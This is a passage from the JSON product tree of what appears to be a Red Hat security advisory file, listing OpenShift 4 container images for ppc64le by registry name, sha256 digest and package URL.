"purl": "pkg:oci/openshift/ose-cluster-baremetal-operator-rhel9@sha256%3A9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573046"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-bootstrap-rhel9@sha256%3Af3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572490"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-capi-rhel9-operator@sha256%3A9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-cloud-controller-manager-rhel9-operator@sha256%3Aaa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604711"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-api-rhel9@sha256%3Ae04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604875"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-rhel9-operator@sha256%3Aa13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557260"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-control-plane-machine-set-rhel9-operator@sha256%3A0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564664"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256%3Aadedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606942"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-dns-rhel9-operator@sha256%3A582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605268"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-image-registry-rhel9-operator@sha256%3Ad83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572202"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-ingress-rhel9-operator@sha256%3A669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573139"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-apiserver-rhel9-operator@sha256%3A4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604138"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-cluster-api-rhel9-operator@sha256%3A46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604093"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-controller-manager-rhel9-operator@sha256%3Abf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605097"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-scheduler-rhel9-operator@sha256%3Ad0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604716"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256%3A047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557255"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-machine-approver-rhel9@sha256%3A2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557261"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-olm-rhel9-operator@sha256%3A4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605218"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-apiserver-rhel9-operator@sha256%3Acff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606091"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-controller-manager-rhel9-operator@sha256%3A2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572197"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"product_id": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ovirt-csi-driver-rhel9-operator@sha256%3A27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604638"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-samples-rhel9-operator@sha256%3A221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606091"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-update-keys-rhel9@sha256%3Ac68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604407"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-container-networking-plugins-rhel9@sha256%3A7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605056"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-resizer-rhel9@sha256%3A385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564121"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-snapshotter-rhel9@sha256%3A5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563469"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-snapshot-controller-rhel9@sha256%3Ab46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564451"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-etcd-rhel9@sha256%3A622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573039"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"product_id": "registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/frr-rhel9@sha256%3A1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602311"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-cloud-controller-manager-rhel9@sha256%3Aaa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557397"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-cluster-api-controllers-rhel9@sha256%3Afadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775562941"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-pd-csi-driver-rhel9@sha256%3A7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602042"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-pd-csi-driver-operator-rhel9@sha256%3Ab8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557339"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibmcloud-cluster-api-controllers-rhel9@sha256%3A5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572733"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
